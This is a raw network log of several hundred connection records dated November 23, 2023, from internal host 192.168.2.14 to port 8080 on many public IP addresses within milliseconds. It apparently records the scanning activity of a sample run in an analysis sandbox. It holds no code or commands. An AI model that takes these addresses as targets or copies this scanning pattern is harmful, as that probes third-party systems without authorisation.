                                              Nov 23, 2023 05:14:50.037364960 CET478168080192.168.2.1431.247.108.25
                                              Nov 23, 2023 05:14:50.037379026 CET478168080192.168.2.1495.17.72.158
                                              Nov 23, 2023 05:14:50.037381887 CET478168080192.168.2.1431.64.174.7
                                              Nov 23, 2023 05:14:50.037391901 CET478168080192.168.2.1495.42.9.250
                                              Nov 23, 2023 05:14:50.037395954 CET478168080192.168.2.1495.81.42.253
                                              Nov 23, 2023 05:14:50.037403107 CET478168080192.168.2.1494.173.176.197
                                              Nov 23, 2023 05:14:50.037416935 CET478168080192.168.2.1495.176.251.92
                                              Nov 23, 2023 05:14:50.037420988 CET478168080192.168.2.1462.248.222.144
                                              Nov 23, 2023 05:14:50.037427902 CET478168080192.168.2.1462.53.58.100
                                              Nov 23, 2023 05:14:50.037430048 CET478168080192.168.2.1485.131.156.239
                                              Nov 23, 2023 05:14:50.037445068 CET478168080192.168.2.1431.120.73.138
                                              Nov 23, 2023 05:14:50.037445068 CET478168080192.168.2.1462.116.167.43
                                              Nov 23, 2023 05:14:50.037448883 CET478168080192.168.2.1485.52.14.171
                                              Nov 23, 2023 05:14:50.037456989 CET478168080192.168.2.1495.176.46.240
                                              Nov 23, 2023 05:14:50.037457943 CET478168080192.168.2.1431.100.233.98
                                              Nov 23, 2023 05:14:50.037458897 CET478168080192.168.2.1462.92.18.247
                                              Nov 23, 2023 05:14:50.037458897 CET478168080192.168.2.1431.209.205.190
                                              Nov 23, 2023 05:14:50.037472010 CET478168080192.168.2.1495.236.24.10
                                              Nov 23, 2023 05:14:50.037473917 CET478168080192.168.2.1494.81.40.47
                                              Nov 23, 2023 05:14:50.037477016 CET478168080192.168.2.1494.83.202.191
                                              Nov 23, 2023 05:14:50.037480116 CET478168080192.168.2.1431.5.122.224
                                              Nov 23, 2023 05:14:50.037487984 CET478168080192.168.2.1431.73.148.200
                                              Nov 23, 2023 05:14:50.037492037 CET478168080192.168.2.1462.58.182.163
                                              Nov 23, 2023 05:14:50.037493944 CET478168080192.168.2.1431.149.134.214
                                              Nov 23, 2023 05:14:50.037494898 CET478168080192.168.2.1494.117.126.37
                                              Nov 23, 2023 05:14:50.037501097 CET478168080192.168.2.1495.166.148.208
                                              Nov 23, 2023 05:14:50.037511110 CET478168080192.168.2.1431.148.53.109
                                              Nov 23, 2023 05:14:50.037518978 CET478168080192.168.2.1462.51.251.139
                                              Nov 23, 2023 05:14:50.037533998 CET478168080192.168.2.1495.104.163.58
                                              Nov 23, 2023 05:14:50.037533998 CET478168080192.168.2.1485.112.100.245
                                              Nov 23, 2023 05:14:50.037535906 CET478168080192.168.2.1431.155.230.154
                                              Nov 23, 2023 05:14:50.037547112 CET478168080192.168.2.1462.4.41.71
                                              Nov 23, 2023 05:14:50.037550926 CET478168080192.168.2.1495.253.190.70
                                              Nov 23, 2023 05:14:50.037559986 CET478168080192.168.2.1485.203.252.37
                                              Nov 23, 2023 05:14:50.037570953 CET478168080192.168.2.1462.210.131.24
                                              Nov 23, 2023 05:14:50.037570953 CET478168080192.168.2.1495.90.101.158
                                              Nov 23, 2023 05:14:50.037574053 CET478168080192.168.2.1485.187.145.123
                                              Nov 23, 2023 05:14:50.037574053 CET478168080192.168.2.1462.35.186.249
                                              Nov 23, 2023 05:14:50.037580967 CET478168080192.168.2.1485.175.197.126
                                              Nov 23, 2023 05:14:50.037587881 CET478168080192.168.2.1494.251.99.216
                                              Nov 23, 2023 05:14:50.037590027 CET478168080192.168.2.1431.52.72.244
                                              Nov 23, 2023 05:14:50.037590027 CET478168080192.168.2.1462.235.64.176
                                              Nov 23, 2023 05:14:50.037609100 CET478168080192.168.2.1494.225.211.134
                                              Nov 23, 2023 05:14:50.037616968 CET478168080192.168.2.1494.188.172.202
                                              Nov 23, 2023 05:14:50.037616968 CET478168080192.168.2.1431.168.255.68
                                              Nov 23, 2023 05:14:50.037617922 CET478168080192.168.2.1431.90.124.155
                                              Nov 23, 2023 05:14:50.037626982 CET478168080192.168.2.1462.91.204.129
                                              Nov 23, 2023 05:14:50.037638903 CET478168080192.168.2.1462.168.238.7
                                              Nov 23, 2023 05:14:50.037642002 CET478168080192.168.2.1495.157.100.173
                                              Nov 23, 2023 05:14:50.037647009 CET478168080192.168.2.1431.129.235.123
                                              Nov 23, 2023 05:14:50.037648916 CET478168080192.168.2.1485.149.71.177
                                              Nov 23, 2023 05:14:50.037662983 CET478168080192.168.2.1495.73.191.167
                                              Nov 23, 2023 05:14:50.037663937 CET478168080192.168.2.1494.182.131.12
                                              Nov 23, 2023 05:14:50.037664890 CET478168080192.168.2.1462.251.143.32
                                              Nov 23, 2023 05:14:50.037674904 CET478168080192.168.2.1485.12.33.163
                                              Nov 23, 2023 05:14:50.037677050 CET478168080192.168.2.1495.31.248.212
                                              Nov 23, 2023 05:14:50.037678957 CET478168080192.168.2.1462.238.241.249
                                              Nov 23, 2023 05:14:50.037694931 CET478168080192.168.2.1495.252.190.211
                                              Nov 23, 2023 05:14:50.037697077 CET478168080192.168.2.1431.9.215.33
                                              Nov 23, 2023 05:14:50.037698984 CET478168080192.168.2.1485.68.8.182
                                              Nov 23, 2023 05:14:50.037698984 CET478168080192.168.2.1485.149.26.74
                                              Nov 23, 2023 05:14:50.037704945 CET478168080192.168.2.1485.69.20.180
                                              Nov 23, 2023 05:14:50.037719965 CET478168080192.168.2.1485.146.53.20
                                              Nov 23, 2023 05:14:50.037722111 CET478168080192.168.2.1495.175.107.216
                                              Nov 23, 2023 05:14:50.037724018 CET478168080192.168.2.1431.204.28.47
                                              Nov 23, 2023 05:14:50.037731886 CET478168080192.168.2.1495.75.216.73
                                              Nov 23, 2023 05:14:50.037736893 CET478168080192.168.2.1431.178.192.115
                                              Nov 23, 2023 05:14:50.037736893 CET478168080192.168.2.1485.183.227.174
                                              Nov 23, 2023 05:14:50.037736893 CET478168080192.168.2.1494.251.139.44
                                              Nov 23, 2023 05:14:50.037748098 CET478168080192.168.2.1485.5.225.117
                                              Nov 23, 2023 05:14:50.037753105 CET478168080192.168.2.1495.48.83.244
                                              Nov 23, 2023 05:14:50.037758112 CET478168080192.168.2.1431.51.214.155
                                              Nov 23, 2023 05:14:50.037766933 CET478168080192.168.2.1431.53.254.239
                                              Nov 23, 2023 05:14:50.037770987 CET478168080192.168.2.1431.178.40.155
                                              Nov 23, 2023 05:14:50.037770987 CET478168080192.168.2.1485.156.215.41
                                              Nov 23, 2023 05:14:50.037775040 CET478168080192.168.2.1485.92.111.180
                                              Nov 23, 2023 05:14:50.037786961 CET478168080192.168.2.1462.59.230.241
                                              Nov 23, 2023 05:14:50.037786961 CET478168080192.168.2.1462.36.20.214
                                              Nov 23, 2023 05:14:50.037786961 CET478168080192.168.2.1462.71.185.92
                                              Nov 23, 2023 05:14:50.037786961 CET478168080192.168.2.1462.205.246.164
                                              Nov 23, 2023 05:14:50.037800074 CET478168080192.168.2.1495.73.109.76
                                              Nov 23, 2023 05:14:50.037805080 CET478168080192.168.2.1431.228.66.128
                                              Nov 23, 2023 05:14:50.037805080 CET478168080192.168.2.1485.158.20.252
                                              Nov 23, 2023 05:14:50.037806034 CET478168080192.168.2.1494.88.97.20
                                              Nov 23, 2023 05:14:50.037806988 CET478168080192.168.2.1485.2.112.83
                                              Nov 23, 2023 05:14:50.037808895 CET478168080192.168.2.1462.48.61.105
                                              Nov 23, 2023 05:14:50.037820101 CET478168080192.168.2.1485.38.253.164
                                              Nov 23, 2023 05:14:50.037823915 CET478168080192.168.2.1494.34.55.93
                                              Nov 23, 2023 05:14:50.037832975 CET478168080192.168.2.1462.210.235.5
                                              Nov 23, 2023 05:14:50.037837029 CET478168080192.168.2.1462.99.21.61
                                              Nov 23, 2023 05:14:50.037846088 CET478168080192.168.2.1494.73.127.237
                                              Nov 23, 2023 05:14:50.037852049 CET478168080192.168.2.1431.67.221.211
                                              Nov 23, 2023 05:14:50.037856102 CET478168080192.168.2.1431.50.154.86
                                              Nov 23, 2023 05:14:50.037858009 CET478168080192.168.2.1431.83.245.164
                                              Nov 23, 2023 05:14:50.037864923 CET478168080192.168.2.1431.118.191.227
                                              Nov 23, 2023 05:14:50.037868023 CET478168080192.168.2.1431.117.141.187
                                              Nov 23, 2023 05:14:50.037882090 CET478168080192.168.2.1462.111.233.239
                                              Nov 23, 2023 05:14:50.037883043 CET478168080192.168.2.1495.252.110.19
                                              Nov 23, 2023 05:14:50.037890911 CET478168080192.168.2.1462.2.93.94
                                              Nov 23, 2023 05:14:50.037899017 CET478168080192.168.2.1431.114.17.164
                                              Nov 23, 2023 05:14:50.037908077 CET478168080192.168.2.1431.28.192.195
                                              Nov 23, 2023 05:14:50.037910938 CET478168080192.168.2.1462.71.241.40
                                              Nov 23, 2023 05:14:50.037911892 CET478168080192.168.2.1494.162.238.49
                                              Nov 23, 2023 05:14:50.037911892 CET478168080192.168.2.1494.53.250.100
                                              Nov 23, 2023 05:14:50.037911892 CET478168080192.168.2.1495.23.95.117
                                              Nov 23, 2023 05:14:50.037911892 CET478168080192.168.2.1494.122.243.239
                                              Nov 23, 2023 05:14:50.037916899 CET478168080192.168.2.1431.34.93.1
                                              Nov 23, 2023 05:14:50.037930965 CET478168080192.168.2.1485.97.15.217
                                              Nov 23, 2023 05:14:50.037936926 CET478168080192.168.2.1495.87.11.59
                                              Nov 23, 2023 05:14:50.037941933 CET478168080192.168.2.1494.161.52.251
                                              Nov 23, 2023 05:14:50.037949085 CET478168080192.168.2.1431.151.189.76
                                              Nov 23, 2023 05:14:50.037950039 CET478168080192.168.2.1495.67.190.165
                                              Nov 23, 2023 05:14:50.037950993 CET478168080192.168.2.1462.107.248.36
                                              Nov 23, 2023 05:14:50.037952900 CET478168080192.168.2.1495.180.195.0
                                              Nov 23, 2023 05:14:50.037952900 CET478168080192.168.2.1485.94.109.245
                                              Nov 23, 2023 05:14:50.037955999 CET478168080192.168.2.1431.15.211.26
                                              Nov 23, 2023 05:14:50.037970066 CET478168080192.168.2.1462.90.253.100
                                              Nov 23, 2023 05:14:50.037974119 CET478168080192.168.2.1495.171.54.238
                                              Nov 23, 2023 05:14:50.037976027 CET478168080192.168.2.1431.20.131.77
                                              Nov 23, 2023 05:14:50.037976027 CET478168080192.168.2.1485.188.60.55
                                              Nov 23, 2023 05:14:50.037978888 CET478168080192.168.2.1485.239.185.176
                                              Nov 23, 2023 05:14:50.037980080 CET478168080192.168.2.1485.75.139.253
                                              Nov 23, 2023 05:14:50.037981987 CET478168080192.168.2.1462.97.85.2
                                              Nov 23, 2023 05:14:50.037990093 CET478168080192.168.2.1485.123.173.103
                                              Nov 23, 2023 05:14:50.037991047 CET478168080192.168.2.1485.122.80.175
                                              Nov 23, 2023 05:14:50.038002968 CET478168080192.168.2.1495.42.208.111
                                              Nov 23, 2023 05:14:50.038003922 CET478168080192.168.2.1431.220.246.4
                                              Nov 23, 2023 05:14:50.038006067 CET478168080192.168.2.1494.145.147.218
                                              Nov 23, 2023 05:14:50.038002968 CET478168080192.168.2.1485.134.129.103
                                              Nov 23, 2023 05:14:50.038019896 CET478168080192.168.2.1431.12.157.115
                                              Nov 23, 2023 05:14:50.038019896 CET478168080192.168.2.1431.157.176.201
                                              Nov 23, 2023 05:14:50.038019896 CET478168080192.168.2.1431.96.43.162
                                              Nov 23, 2023 05:14:50.038026094 CET478168080192.168.2.1485.76.247.150
                                              Nov 23, 2023 05:14:50.038034916 CET478168080192.168.2.1485.35.122.157
                                              Nov 23, 2023 05:14:50.038034916 CET478168080192.168.2.1494.135.45.128
                                              Nov 23, 2023 05:14:50.038043022 CET478168080192.168.2.1494.171.43.193
                                              Nov 23, 2023 05:14:50.038053989 CET478168080192.168.2.1462.69.20.45
                                              Nov 23, 2023 05:14:50.038068056 CET478168080192.168.2.1494.147.128.51
                                              Nov 23, 2023 05:14:50.038069010 CET478168080192.168.2.1495.144.132.165
                                              Nov 23, 2023 05:14:50.038069963 CET478168080192.168.2.1494.127.68.246
                                              Nov 23, 2023 05:14:50.038069963 CET478168080192.168.2.1485.235.151.132
                                              Nov 23, 2023 05:14:50.038069963 CET478168080192.168.2.1495.23.138.245
                                              Nov 23, 2023 05:14:50.038070917 CET478168080192.168.2.1494.74.151.6
                                              Nov 23, 2023 05:14:50.038070917 CET478168080192.168.2.1431.252.190.46
                                              Nov 23, 2023 05:14:50.038070917 CET478168080192.168.2.1494.186.105.163
                                              Nov 23, 2023 05:14:50.038081884 CET478168080192.168.2.1462.238.228.82
                                              Nov 23, 2023 05:14:50.038090944 CET478168080192.168.2.1485.3.188.160
                                              Nov 23, 2023 05:14:50.038090944 CET478168080192.168.2.1431.186.122.209
                                              Nov 23, 2023 05:14:50.038091898 CET478168080192.168.2.1485.144.156.227
                                              Nov 23, 2023 05:14:50.038094997 CET478168080192.168.2.1495.224.100.218
                                              Nov 23, 2023 05:14:50.038105965 CET478168080192.168.2.1494.224.55.164
                                              Nov 23, 2023 05:14:50.038105965 CET478168080192.168.2.1485.15.93.211
                                              Nov 23, 2023 05:14:50.038121939 CET478168080192.168.2.1462.248.188.37
                                              Nov 23, 2023 05:14:50.038124084 CET478168080192.168.2.1495.193.80.104
                                              Nov 23, 2023 05:14:50.038129091 CET478168080192.168.2.1494.42.251.210
                                              Nov 23, 2023 05:14:50.038134098 CET478168080192.168.2.1431.28.95.34
                                              Nov 23, 2023 05:14:50.038136959 CET478168080192.168.2.1431.233.235.148
                                              Nov 23, 2023 05:14:50.038142920 CET478168080192.168.2.1485.133.129.8
                                              Nov 23, 2023 05:14:50.038144112 CET478168080192.168.2.1485.206.20.154
                                              Nov 23, 2023 05:14:50.038158894 CET478168080192.168.2.1495.107.231.64
                                              Nov 23, 2023 05:14:50.038161039 CET478168080192.168.2.1485.205.240.167
                                              Nov 23, 2023 05:14:50.038161993 CET478168080192.168.2.1462.11.68.44
                                              Nov 23, 2023 05:14:50.038161039 CET478168080192.168.2.1431.109.248.55
                                              Nov 23, 2023 05:14:50.038165092 CET478168080192.168.2.1462.38.151.159
                                              Nov 23, 2023 05:14:50.038168907 CET478168080192.168.2.1431.142.208.83
                                              Nov 23, 2023 05:14:50.038173914 CET478168080192.168.2.1431.210.114.49
                                              Nov 23, 2023 05:14:50.038182974 CET478168080192.168.2.1485.69.45.54
                                              Nov 23, 2023 05:14:50.038192034 CET478168080192.168.2.1485.86.200.150
                                              Nov 23, 2023 05:14:50.038182974 CET478168080192.168.2.1462.185.172.67
                                              Nov 23, 2023 05:14:50.038184881 CET478168080192.168.2.1462.166.147.52
                                              Nov 23, 2023 05:14:50.038204908 CET478168080192.168.2.1485.69.170.61
                                              Nov 23, 2023 05:14:50.038208008 CET478168080192.168.2.1485.187.7.243
                                              Nov 23, 2023 05:14:50.038208008 CET478168080192.168.2.1494.134.163.148
                                              Nov 23, 2023 05:14:50.038209915 CET478168080192.168.2.1494.47.56.236
                                              Nov 23, 2023 05:14:50.038219929 CET478168080192.168.2.1462.103.244.97
                                              Nov 23, 2023 05:14:50.038219929 CET478168080192.168.2.1431.229.25.103
                                              Nov 23, 2023 05:14:50.038220882 CET478168080192.168.2.1495.6.7.3
                                              Nov 23, 2023 05:14:50.038232088 CET478168080192.168.2.1494.92.15.118
                                              Nov 23, 2023 05:14:50.038235903 CET478168080192.168.2.1495.3.12.176
                                              Nov 23, 2023 05:14:50.038240910 CET478168080192.168.2.1494.120.64.114
                                              Nov 23, 2023 05:14:50.038253069 CET478168080192.168.2.1485.192.226.42
                                              Nov 23, 2023 05:14:50.038254023 CET478168080192.168.2.1495.177.206.177
                                              Nov 23, 2023 05:14:50.038258076 CET478168080192.168.2.1485.15.120.80
                                              Nov 23, 2023 05:14:50.038266897 CET478168080192.168.2.1485.92.76.245
                                              Nov 23, 2023 05:14:50.038268089 CET478168080192.168.2.1462.122.241.178
                                              Nov 23, 2023 05:14:50.038281918 CET478168080192.168.2.1495.71.147.134
                                              Nov 23, 2023 05:14:50.038281918 CET478168080192.168.2.1495.162.1.231
                                              Nov 23, 2023 05:14:50.038285017 CET478168080192.168.2.1462.8.13.0
                                              Nov 23, 2023 05:14:50.038284063 CET478168080192.168.2.1431.92.253.52
                                              Nov 23, 2023 05:14:50.038286924 CET478168080192.168.2.1431.98.241.125
                                              Nov 23, 2023 05:14:50.038294077 CET478168080192.168.2.1431.112.206.19
                                              Nov 23, 2023 05:14:50.038300037 CET478168080192.168.2.1494.20.239.156
                                              Nov 23, 2023 05:14:50.038305044 CET478168080192.168.2.1431.149.91.207
                                              Nov 23, 2023 05:14:50.038307905 CET478168080192.168.2.1462.131.247.134
                                              Nov 23, 2023 05:14:50.038311958 CET478168080192.168.2.1431.28.148.161
                                              Nov 23, 2023 05:14:50.038325071 CET478168080192.168.2.1462.73.195.98
                                              Nov 23, 2023 05:14:50.038326979 CET478168080192.168.2.1495.100.103.92
                                              Nov 23, 2023 05:14:50.038326979 CET478168080192.168.2.1485.233.58.10
                                              Nov 23, 2023 05:14:50.038338900 CET478168080192.168.2.1431.230.25.101
                                              Nov 23, 2023 05:14:50.038340092 CET478168080192.168.2.1431.129.40.166
                                              Nov 23, 2023 05:14:50.038343906 CET478168080192.168.2.1494.58.116.79
                                              Nov 23, 2023 05:14:50.038347006 CET478168080192.168.2.1485.185.183.227
                                              Nov 23, 2023 05:14:50.038347960 CET478168080192.168.2.1494.186.176.215
                                              Nov 23, 2023 05:14:50.038350105 CET478168080192.168.2.1495.232.101.155
                                              Nov 23, 2023 05:14:50.038361073 CET478168080192.168.2.1494.30.200.102
                                              Nov 23, 2023 05:14:50.038368940 CET478168080192.168.2.1431.171.140.19
                                              Nov 23, 2023 05:14:50.038369894 CET478168080192.168.2.1431.95.46.12
                                              Nov 23, 2023 05:14:50.038377047 CET478168080192.168.2.1495.195.14.132
                                              Nov 23, 2023 05:14:50.038382053 CET478168080192.168.2.1431.142.245.116
                                              Nov 23, 2023 05:14:50.038386106 CET478168080192.168.2.1431.114.87.125
                                              Nov 23, 2023 05:14:50.038391113 CET478168080192.168.2.1485.94.47.9
                                              Nov 23, 2023 05:14:50.038403034 CET478168080192.168.2.1495.196.126.236
                                              Nov 23, 2023 05:14:50.038408995 CET478168080192.168.2.1431.84.208.40
                                              Nov 23, 2023 05:14:50.038409948 CET478168080192.168.2.1494.15.126.35
                                              Nov 23, 2023 05:14:50.038415909 CET478168080192.168.2.1431.34.81.160
                                              Nov 23, 2023 05:14:50.038422108 CET478168080192.168.2.1495.241.146.185
                                              Nov 23, 2023 05:14:50.038424015 CET478168080192.168.2.1431.5.201.225
                                              Nov 23, 2023 05:14:50.038431883 CET478168080192.168.2.1494.110.130.144
                                              Nov 23, 2023 05:14:50.038439989 CET478168080192.168.2.1431.36.179.253
                                              Nov 23, 2023 05:14:50.038441896 CET478168080192.168.2.1462.123.201.235
                                              Nov 23, 2023 05:14:50.038451910 CET478168080192.168.2.1485.24.20.37
                                              Nov 23, 2023 05:14:50.038461924 CET478168080192.168.2.1462.186.82.31
                                              Nov 23, 2023 05:14:50.038461924 CET478168080192.168.2.1462.102.192.214
                                              Nov 23, 2023 05:14:50.038465023 CET478168080192.168.2.1462.198.79.236
                                              Nov 23, 2023 05:14:50.038475990 CET478168080192.168.2.1431.162.63.57
                                              Nov 23, 2023 05:14:50.038486004 CET478168080192.168.2.1431.110.110.199
                                              Nov 23, 2023 05:14:50.038486004 CET478168080192.168.2.1495.42.134.229
                                              Nov 23, 2023 05:14:50.038490057 CET478168080192.168.2.1462.171.95.72
                                              Nov 23, 2023 05:14:50.038491964 CET478168080192.168.2.1494.133.172.157
                                              Nov 23, 2023 05:14:50.038491964 CET478168080192.168.2.1495.195.197.43
                                              Nov 23, 2023 05:14:50.038502932 CET478168080192.168.2.1494.94.45.128
                                              Nov 23, 2023 05:14:50.038503885 CET478168080192.168.2.1462.77.74.114
                                              Nov 23, 2023 05:14:50.038506985 CET478168080192.168.2.1485.212.204.205
                                              Nov 23, 2023 05:14:50.038511992 CET478168080192.168.2.1431.122.93.128
                                              Nov 23, 2023 05:14:50.038511992 CET478168080192.168.2.1431.13.57.140
                                              Nov 23, 2023 05:14:50.038515091 CET478168080192.168.2.1494.134.85.86
                                              Nov 23, 2023 05:14:50.038523912 CET478168080192.168.2.1462.228.138.246
                                              Nov 23, 2023 05:14:50.038526058 CET478168080192.168.2.1485.41.192.197
                                              Nov 23, 2023 05:14:50.038542032 CET478168080192.168.2.1495.239.3.120
                                              Nov 23, 2023 05:14:50.038542986 CET478168080192.168.2.1495.192.104.234
                                              Nov 23, 2023 05:14:50.038546085 CET478168080192.168.2.1462.211.15.133
                                              Nov 23, 2023 05:14:50.038552046 CET478168080192.168.2.1485.109.53.132
                                              Nov 23, 2023 05:14:50.038556099 CET478168080192.168.2.1485.158.239.107
                                              Nov 23, 2023 05:14:50.038556099 CET478168080192.168.2.1485.137.23.41
                                              Nov 23, 2023 05:14:50.038556099 CET478168080192.168.2.1485.214.29.253
                                              Nov 23, 2023 05:14:50.038558006 CET478168080192.168.2.1495.10.222.156
                                              Nov 23, 2023 05:14:50.038556099 CET478168080192.168.2.1462.216.238.18
                                              Nov 23, 2023 05:14:50.038558006 CET478168080192.168.2.1485.217.1.146
                                              Nov 23, 2023 05:14:50.038556099 CET478168080192.168.2.1495.33.249.111
                                              Nov 23, 2023 05:14:50.038558006 CET478168080192.168.2.1431.160.32.197
                                              Nov 23, 2023 05:14:50.038559914 CET478168080192.168.2.1494.33.174.27
                                              Nov 23, 2023 05:14:50.038577080 CET478168080192.168.2.1485.124.8.55
                                              Nov 23, 2023 05:14:50.038582087 CET478168080192.168.2.1495.193.84.49
                                              Nov 23, 2023 05:14:50.038584948 CET478168080192.168.2.1462.227.187.184
                                              Nov 23, 2023 05:14:50.038592100 CET478168080192.168.2.1494.205.44.227
                                              Nov 23, 2023 05:14:50.038594007 CET478168080192.168.2.1485.17.238.106
                                              Nov 23, 2023 05:14:50.038599014 CET478168080192.168.2.1485.40.200.207
                                              Nov 23, 2023 05:14:50.038611889 CET478168080192.168.2.1495.153.33.81
                                              Nov 23, 2023 05:14:50.038614035 CET478168080192.168.2.1494.5.88.71
                                              Nov 23, 2023 05:14:50.038614035 CET478168080192.168.2.1495.194.171.107
                                              Nov 23, 2023 05:14:50.038614035 CET478168080192.168.2.1494.88.125.167
                                              Nov 23, 2023 05:14:50.038616896 CET478168080192.168.2.1431.146.24.217
                                              Nov 23, 2023 05:14:50.038630009 CET478168080192.168.2.1495.133.253.122
                                              Nov 23, 2023 05:14:50.038630009 CET478168080192.168.2.1462.233.167.150
                                              Nov 23, 2023 05:14:50.038630962 CET478168080192.168.2.1495.27.249.165
                                              Nov 23, 2023 05:14:50.038635969 CET478168080192.168.2.1495.213.43.8
                                              Nov 23, 2023 05:14:50.038640976 CET478168080192.168.2.1431.148.32.158
                                              Nov 23, 2023 05:14:50.038646936 CET478168080192.168.2.1494.213.118.202
                                              Nov 23, 2023 05:14:50.038654089 CET478168080192.168.2.1494.247.119.141
                                              Nov 23, 2023 05:14:50.038655043 CET478168080192.168.2.1431.180.212.131
                                              Nov 23, 2023 05:14:50.038661957 CET478168080192.168.2.1431.89.202.19
                                              Nov 23, 2023 05:14:50.038674116 CET478168080192.168.2.1462.93.235.104
                                              Nov 23, 2023 05:14:50.038675070 CET478168080192.168.2.1462.238.129.140
                                              Nov 23, 2023 05:14:50.038683891 CET478168080192.168.2.1462.201.214.197
                                              Nov 23, 2023 05:14:50.038687944 CET478168080192.168.2.1431.101.128.108
                                              Nov 23, 2023 05:14:50.038697958 CET478168080192.168.2.1495.234.152.25
                                              Nov 23, 2023 05:14:50.038697958 CET478168080192.168.2.1462.60.46.144
                                              Nov 23, 2023 05:14:50.038700104 CET478168080192.168.2.1431.97.114.148
                                              Nov 23, 2023 05:14:50.038702965 CET478168080192.168.2.1495.30.169.17
                                              Nov 23, 2023 05:14:50.038705111 CET478168080192.168.2.1485.101.120.243
                                              Nov 23, 2023 05:14:50.038706064 CET478168080192.168.2.1485.6.234.251
                                              Nov 23, 2023 05:14:50.038707018 CET478168080192.168.2.1431.77.111.112
                                              Nov 23, 2023 05:14:50.038712025 CET478168080192.168.2.1494.159.253.142
                                              Nov 23, 2023 05:14:50.038718939 CET478168080192.168.2.1494.39.200.174
                                              Nov 23, 2023 05:14:50.038722038 CET478168080192.168.2.1431.137.111.235
                                              Nov 23, 2023 05:14:50.038733959 CET478168080192.168.2.1431.31.134.163
                                              Nov 23, 2023 05:14:50.038736105 CET478168080192.168.2.1462.121.32.205
                                              Nov 23, 2023 05:14:50.038737059 CET478168080192.168.2.1431.121.177.121
                                              Nov 23, 2023 05:14:50.038738012 CET478168080192.168.2.1462.94.34.56
                                              Nov 23, 2023 05:14:50.038738012 CET478168080192.168.2.1494.97.5.243
                                              Nov 23, 2023 05:14:50.038743019 CET478168080192.168.2.1485.226.6.109
                                              Nov 23, 2023 05:14:50.038754940 CET478168080192.168.2.1495.189.214.33
                                              Nov 23, 2023 05:14:50.038760900 CET478168080192.168.2.1495.129.228.212
                                              Nov 23, 2023 05:14:50.038763046 CET478168080192.168.2.1431.248.218.59
                                              Nov 23, 2023 05:14:50.038763046 CET478168080192.168.2.1431.116.228.187
                                              Nov 23, 2023 05:14:50.038770914 CET478168080192.168.2.1495.13.18.3
                                              Nov 23, 2023 05:14:50.038775921 CET478168080192.168.2.1431.155.19.44
                                              Nov 23, 2023 05:14:50.038784027 CET478168080192.168.2.1431.197.17.68
                                              Nov 23, 2023 05:14:50.038794994 CET478168080192.168.2.1431.47.238.115
                                              Nov 23, 2023 05:14:50.038794994 CET478168080192.168.2.1485.189.152.165
                                              Nov 23, 2023 05:14:50.038798094 CET478168080192.168.2.1494.88.191.44
                                              Nov 23, 2023 05:14:50.038810015 CET478168080192.168.2.1485.100.225.94
                                              Nov 23, 2023 05:14:50.038816929 CET478168080192.168.2.1462.132.29.47
                                              Nov 23, 2023 05:14:50.038816929 CET478168080192.168.2.1462.55.56.253
                                              Nov 23, 2023 05:14:50.038824081 CET478168080192.168.2.1495.62.83.180
                                              Nov 23, 2023 05:14:50.038825989 CET478168080192.168.2.1494.32.206.150
                                              Nov 23, 2023 05:14:50.038826942 CET478168080192.168.2.1485.53.105.158
                                              Nov 23, 2023 05:14:50.038831949 CET478168080192.168.2.1495.185.226.160
                                              Nov 23, 2023 05:14:50.038842916 CET478168080192.168.2.1495.209.111.207
                                              Nov 23, 2023 05:14:50.038845062 CET478168080192.168.2.1495.244.88.112
                                              Nov 23, 2023 05:14:50.038846016 CET478168080192.168.2.1494.122.87.12
                                              Nov 23, 2023 05:14:50.038851023 CET478168080192.168.2.1431.49.25.85
                                              Nov 23, 2023 05:14:50.038851023 CET478168080192.168.2.1485.246.132.112
                                              Nov 23, 2023 05:14:50.038853884 CET478168080192.168.2.1431.208.193.185
                                              Nov 23, 2023 05:14:50.038853884 CET478168080192.168.2.1485.218.1.249
                                              Nov 23, 2023 05:14:50.038863897 CET478168080192.168.2.1431.7.183.9
                                              Nov 23, 2023 05:14:50.038866997 CET478168080192.168.2.1494.131.53.29
                                              Nov 23, 2023 05:14:50.038871050 CET478168080192.168.2.1462.219.10.146
                                              Nov 23, 2023 05:14:50.038886070 CET478168080192.168.2.1494.220.27.68
                                              Nov 23, 2023 05:14:50.038886070 CET478168080192.168.2.1431.39.3.51
                                              Nov 23, 2023 05:14:50.038891077 CET478168080192.168.2.1462.16.74.124
                                              Nov 23, 2023 05:14:50.038892031 CET478168080192.168.2.1485.112.81.19
                                              Nov 23, 2023 05:14:50.038892031 CET478168080192.168.2.1431.50.251.159
                                              Nov 23, 2023 05:14:50.038898945 CET478168080192.168.2.1494.252.103.77
                                              Nov 23, 2023 05:14:50.038902998 CET478168080192.168.2.1495.102.224.203
                                              Nov 23, 2023 05:14:50.038918972 CET478168080192.168.2.1431.74.101.201
                                              Nov 23, 2023 05:14:50.038919926 CET478168080192.168.2.1494.136.18.174
                                              Nov 23, 2023 05:14:50.038922071 CET478168080192.168.2.1495.250.126.116
                                              Nov 23, 2023 05:14:50.038922071 CET478168080192.168.2.1495.86.72.138
                                              Nov 23, 2023 05:14:50.038923025 CET478168080192.168.2.1494.19.98.42
                                              Nov 23, 2023 05:14:50.038923979 CET478168080192.168.2.1431.103.163.165
                                              Nov 23, 2023 05:14:50.038928032 CET478168080192.168.2.1494.69.221.117
                                              Nov 23, 2023 05:14:50.038938046 CET478168080192.168.2.1494.102.225.61
                                              Nov 23, 2023 05:14:50.038942099 CET478168080192.168.2.1462.13.186.242
                                              Nov 23, 2023 05:14:50.038944006 CET478168080192.168.2.1462.121.132.47
                                              Nov 23, 2023 05:14:50.038944960 CET478168080192.168.2.1462.129.210.36
                                              Nov 23, 2023 05:14:50.038955927 CET478168080192.168.2.1494.184.116.246
                                              Nov 23, 2023 05:14:50.038959026 CET478168080192.168.2.1495.145.20.100
                                              Nov 23, 2023 05:14:50.038960934 CET478168080192.168.2.1485.234.68.92
                                              Nov 23, 2023 05:14:50.038960934 CET478168080192.168.2.1495.170.134.64
                                              Nov 23, 2023 05:14:50.038975000 CET478168080192.168.2.1495.151.250.167
                                              Nov 23, 2023 05:14:50.038975000 CET478168080192.168.2.1462.119.234.144
                                              Nov 23, 2023 05:14:50.038975954 CET478168080192.168.2.1431.25.234.149
                                              Nov 23, 2023 05:14:50.038986921 CET478168080192.168.2.1495.252.167.208
                                              Nov 23, 2023 05:14:50.038990974 CET478168080192.168.2.1462.30.225.26
                                              Nov 23, 2023 05:14:50.039002895 CET478168080192.168.2.1431.20.130.72
                                              Nov 23, 2023 05:14:50.039005041 CET478168080192.168.2.1494.36.158.145
                                              Nov 23, 2023 05:14:50.039009094 CET478168080192.168.2.1462.150.36.32
